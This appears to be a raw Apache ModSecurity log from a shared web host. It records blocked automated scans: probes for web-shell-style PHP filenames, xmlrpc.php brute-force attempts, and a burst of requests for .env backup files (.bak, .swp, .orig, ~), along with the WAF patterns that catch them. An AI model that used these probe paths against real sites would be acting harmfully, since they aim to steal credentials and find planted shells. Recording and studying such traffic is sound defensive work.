[Tue May 26 14:33:34.874798 2026] [security2:error] [pid 626747:tid 627003] [client 4.204.220.190:12457] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/mac.php"] [unique_id "ahVh5hVF8Qmdmw_OMfLgXgAAAYg"]
[Tue May 26 14:33:34.961951 2026] [security2:error] [pid 626747:tid 626973] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh5hVF8Qmdmw_OMfLgVgAAAWo"]
[Tue May 26 14:33:35.077640 2026] [security2:error] [pid 626747:tid 626905] [client 4.204.220.190:21378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/25d653587fdfd1.php"] [unique_id "ahVh5xVF8Qmdmw_OMfLgYgAAASY"]
[Tue May 26 14:33:35.077782 2026] [security2:error] [pid 626747:tid 626905] [client 4.204.220.190:21378] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/25d653587fdfd1.php"] [unique_id "ahVh5xVF8Qmdmw_OMfLgYgAAASY"]
[Tue May 26 14:33:35.263516 2026] [security2:error] [pid 626747:tid 626915] [client 4.204.220.190:12451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/wefile.php"] [unique_id "ahVh5xVF8Qmdmw_OMfLgbQAAATA"]
[Tue May 26 14:33:35.263638 2026] [security2:error] [pid 626747:tid 626915] [client 4.204.220.190:12451] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/wefile.php"] [unique_id "ahVh5xVF8Qmdmw_OMfLgbQAAATA"]
[Tue May 26 14:33:36.591347 2026] [security2:error] [pid 626747:tid 626963] [client 162.158.94.19:9561] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "blettclms.com"] [uri "/wp-admin/install.php"] [unique_id "ahVh6BVF8Qmdmw_OMfLgigAAAWA"]
[Tue May 26 14:33:36.810949 2026] [security2:error] [pid 626747:tid 626910] [client 4.204.220.190:65382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/casp3.php"] [unique_id "ahVh6BVF8Qmdmw_OMfLgpQAAASs"]
[Tue May 26 14:33:36.811777 2026] [security2:error] [pid 626747:tid 626910] [client 4.204.220.190:65382] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/casp3.php"] [unique_id "ahVh6BVF8Qmdmw_OMfLgpQAAASs"]
[Tue May 26 14:33:37.148269 2026] [security2:error] [pid 626747:tid 626903] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh6BVF8Qmdmw_OMfLgngAAASQ"]
[Tue May 26 14:33:37.153364 2026] [proxy:error] [pid 626747:tid 626896] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:37.153425 2026] [proxy_http:error] [pid 626747:tid 626896] [client 4.204.220.190:21635] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:37.153997 2026] [proxy:error] [pid 626747:tid 626896] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:37.154028 2026] [proxy_http:error] [pid 626747:tid 626896] [client 4.204.220.190:21635] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:37.154098 2026] [security2:error] [pid 626747:tid 626896] [client 4.204.220.190:21635] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh6RVF8Qmdmw_OMfLgtAAAAR0"]
[Tue May 26 14:33:37.163912 2026] [security2:error] [pid 626747:tid 626964] [client 202.141.83.254:19851] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh6RVF8Qmdmw_OMfLgtQAAAWE"]
[Tue May 26 14:33:37.164520 2026] [security2:error] [pid 626747:tid 626964] [client 202.141.83.254:19851] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh6RVF8Qmdmw_OMfLgtQAAAWE"]
[Tue May 26 14:33:37.400811 2026] [proxy:error] [pid 626747:tid 626889] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:37.400899 2026] [proxy_http:error] [pid 626747:tid 626889] [client 4.204.220.190:38648] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:37.401483 2026] [proxy:error] [pid 626747:tid 626889] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:37.401514 2026] [proxy_http:error] [pid 626747:tid 626889] [client 4.204.220.190:38648] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:37.401610 2026] [security2:error] [pid 626747:tid 626889] [client 4.204.220.190:38648] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh6RVF8Qmdmw_OMfLgtgAAARY"]
[Tue May 26 14:33:37.718712 2026] [security2:error] [pid 626747:tid 626949] [client 4.204.220.190:21634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/wp-admin/css/colour.php"] [unique_id "ahVh6RVF8Qmdmw_OMfLgwAAAAVI"]
[Tue May 26 14:33:37.718831 2026] [security2:error] [pid 626747:tid 626949] [client 4.204.220.190:21634] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/wp-admin/css/colour.php"] [unique_id "ahVh6RVF8Qmdmw_OMfLgwAAAAVI"]
[Tue May 26 14:33:37.794349 2026] [security2:error] [pid 626747:tid 626877] [client 162.158.94.18:9761] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "blettclms.com"] [uri "/index.php/wp-admin/install.php"] [unique_id "ahVh6RVF8Qmdmw_OMfLgrAABCnk"]
[Tue May 26 14:33:38.024236 2026] [security2:error] [pid 626747:tid 626939] [client 4.204.220.190:38595] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/half.php"] [unique_id "ahVh6hVF8Qmdmw_OMfLgywAAAUg"]
[Tue May 26 14:33:38.024340 2026] [security2:error] [pid 626747:tid 626939] [client 4.204.220.190:38595] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/half.php"] [unique_id "ahVh6hVF8Qmdmw_OMfLgywAAAUg"]
[Tue May 26 14:33:38.293982 2026] [security2:error] [pid 626747:tid 626931] [client 4.204.220.190:38602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/2P.php"] [unique_id "ahVh6hVF8Qmdmw_OMfLg1gAAAUA"]
[Tue May 26 14:33:38.294115 2026] [security2:error] [pid 626747:tid 626931] [client 4.204.220.190:38602] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/2P.php"] [unique_id "ahVh6hVF8Qmdmw_OMfLg1gAAAUA"]
[Tue May 26 14:33:38.541455 2026] [security2:error] [pid 626747:tid 626953] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh6hVF8Qmdmw_OMfLg0QAAAVY"]
[Tue May 26 14:33:38.567399 2026] [security2:error] [pid 626747:tid 626975] [client 4.204.220.190:21406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/tires.php"] [unique_id "ahVh6hVF8Qmdmw_OMfLg2gAAAWw"]
[Tue May 26 14:33:38.567542 2026] [security2:error] [pid 626747:tid 626975] [client 4.204.220.190:21406] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/tires.php"] [unique_id "ahVh6hVF8Qmdmw_OMfLg2gAAAWw"]
[Tue May 26 14:33:38.754114 2026] [proxy:error] [pid 626747:tid 626878] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:38.754175 2026] [proxy_http:error] [pid 626747:tid 626878] [client 4.204.220.190:12435] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:38.754816 2026] [proxy:error] [pid 626747:tid 626878] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:38.754850 2026] [proxy_http:error] [pid 626747:tid 626878] [client 4.204.220.190:12435] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:38.754949 2026] [security2:error] [pid 626747:tid 626878] [client 4.204.220.190:12435] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh6hVF8Qmdmw_OMfLg4gAAAQs"]
[Tue May 26 14:33:39.359209 2026] [security2:error] [pid 626747:tid 626982] [client 4.204.220.190:21308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/like.php"] [unique_id "ahVh6xVF8Qmdmw_OMfLg7wAAAXM"]
[Tue May 26 14:33:39.359311 2026] [security2:error] [pid 626747:tid 626982] [client 4.204.220.190:21308] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/like.php"] [unique_id "ahVh6xVF8Qmdmw_OMfLg7wAAAXM"]
[Tue May 26 14:33:39.925888 2026] [security2:error] [pid 626747:tid 626987] [client 154.161.32.97:46544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVh6xVF8Qmdmw_OMfLg-gAAAXg"]
[Tue May 26 14:33:39.926105 2026] [security2:error] [pid 626747:tid 626987] [client 154.161.32.97:46544] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVh6xVF8Qmdmw_OMfLg-gAAAXg"]
[Tue May 26 14:33:40.156906 2026] [security2:error] [pid 626747:tid 626936] [client 208.84.100.165:49226] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.production.copy"] [unique_id "ahVh7BVF8Qmdmw_OMfLhAQAAAUU"]
[Tue May 26 14:33:40.439560 2026] [security2:error] [pid 626747:tid 626939] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh7BVF8Qmdmw_OMfLhAAAAAUg"]
[Tue May 26 14:33:41.618471 2026] [core:crit] [pid 626747:tid 626883] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:33:42.527442 2026] [security2:error] [pid 626747:tid 626936] [client 4.204.220.190:35335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/.well-known/about.php"] [unique_id "ahVh7hVF8Qmdmw_OMfLhOAAAAUU"]
[Tue May 26 14:33:42.527595 2026] [security2:error] [pid 626747:tid 626936] [client 4.204.220.190:35335] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/.well-known/about.php"] [unique_id "ahVh7hVF8Qmdmw_OMfLhOAAAAUU"]
[Tue May 26 14:33:43.150583 2026] [security2:error] [pid 626747:tid 626979] [client 4.204.220.190:21401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahVh7xVF8Qmdmw_OMfLhSgAAAXA"]
[Tue May 26 14:33:43.150705 2026] [security2:error] [pid 626747:tid 626979] [client 4.204.220.190:21401] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahVh7xVF8Qmdmw_OMfLhSgAAAXA"]
[Tue May 26 14:33:43.232326 2026] [security2:error] [pid 626747:tid 626911] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh7hVF8Qmdmw_OMfLhRQAAASw"]
[Tue May 26 14:33:44.045120 2026] [security2:error] [pid 626747:tid 626972] [client 208.84.100.165:49278] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.bak"] [unique_id "ahVh8BVF8Qmdmw_OMfLhXgAAAWk"]
[Tue May 26 14:33:44.046756 2026] [security2:error] [pid 626747:tid 627002] [client 208.84.100.165:49386] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.production.bak"] [unique_id "ahVh8BVF8Qmdmw_OMfLhXwAAAYc"]
[Tue May 26 14:33:44.047636 2026] [security2:error] [pid 626747:tid 626948] [client 208.84.100.165:49406] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.production.backup"] [unique_id "ahVh8BVF8Qmdmw_OMfLhYAAAAVE"]
[Tue May 26 14:33:44.048185 2026] [security2:error] [pid 626747:tid 626961] [client 208.84.100.165:49426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.production~"] [unique_id "ahVh8BVF8Qmdmw_OMfLhYwAAAV4"]
[Tue May 26 14:33:44.048271 2026] [security2:error] [pid 626747:tid 626980] [client 208.84.100.165:49430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.production.swp"] [unique_id "ahVh8BVF8Qmdmw_OMfLhYgAAAXE"]
[Tue May 26 14:33:44.048648 2026] [security2:error] [pid 626747:tid 626992] [client 208.84.100.165:49444] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.production.orig"] [unique_id "ahVh8BVF8Qmdmw_OMfLhZAAAAX0"]
[Tue May 26 14:33:44.052354 2026] [security2:error] [pid 626747:tid 626940] [client 208.84.100.165:49290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.backup"] [unique_id "ahVh8BVF8Qmdmw_OMfLhbwAAAUk"]
[Tue May 26 14:33:44.052614 2026] [security2:error] [pid 626747:tid 626946] [client 208.84.100.165:49338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.orig"] [unique_id "ahVh8BVF8Qmdmw_OMfLhbgAAAU8"]
[Tue May 26 14:33:44.052749 2026] [security2:error] [pid 626747:tid 626999] [client 208.84.100.165:49378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.local.swp"] [unique_id "ahVh8BVF8Qmdmw_OMfLhcQAAAYQ"]
[Tue May 26 14:33:44.052757 2026] [security2:error] [pid 626747:tid 626918] [client 208.84.100.165:49394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.production.old"] [unique_id "ahVh8BVF8Qmdmw_OMfLhZQAAATM"]
[Tue May 26 14:33:44.053619 2026] [security2:error] [pid 626747:tid 626900] [client 208.84.100.165:49282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.old"] [unique_id "ahVh8BVF8Qmdmw_OMfLhZwAAASE"]
[Tue May 26 14:33:44.053991 2026] [security2:error] [pid 626747:tid 626958] [client 208.84.100.165:49312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env~"] [unique_id "ahVh8BVF8Qmdmw_OMfLhagAAAVs"]
[Tue May 26 14:33:44.054024 2026] [security2:error] [pid 626747:tid 626952] [client 208.84.100.165:49348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.copy"] [unique_id "ahVh8BVF8Qmdmw_OMfLhaQAAAVU"]
[Tue May 26 14:33:44.054237 2026] [security2:error] [pid 626747:tid 626934] [client 208.84.100.165:49380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.local.orig"] [unique_id "ahVh8BVF8Qmdmw_OMfLhcwAAAUM"]
[Tue May 26 14:33:44.054488 2026] [security2:error] [pid 626747:tid 626944] [client 208.84.100.165:49368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.local~"] [unique_id "ahVh8BVF8Qmdmw_OMfLhcgAAAU0"]
[Tue May 26 14:33:44.056844 2026] [security2:error] [pid 626747:tid 626928] [client 208.84.100.165:49350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.local.bak"] [unique_id "ahVh8BVF8Qmdmw_OMfLhdgAAAT0"]
[Tue May 26 14:33:44.057007 2026] [security2:error] [pid 626747:tid 626995] [client 208.84.100.165:49384] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.local.copy"] [unique_id "ahVh8BVF8Qmdmw_OMfLhdQAAAYA"]
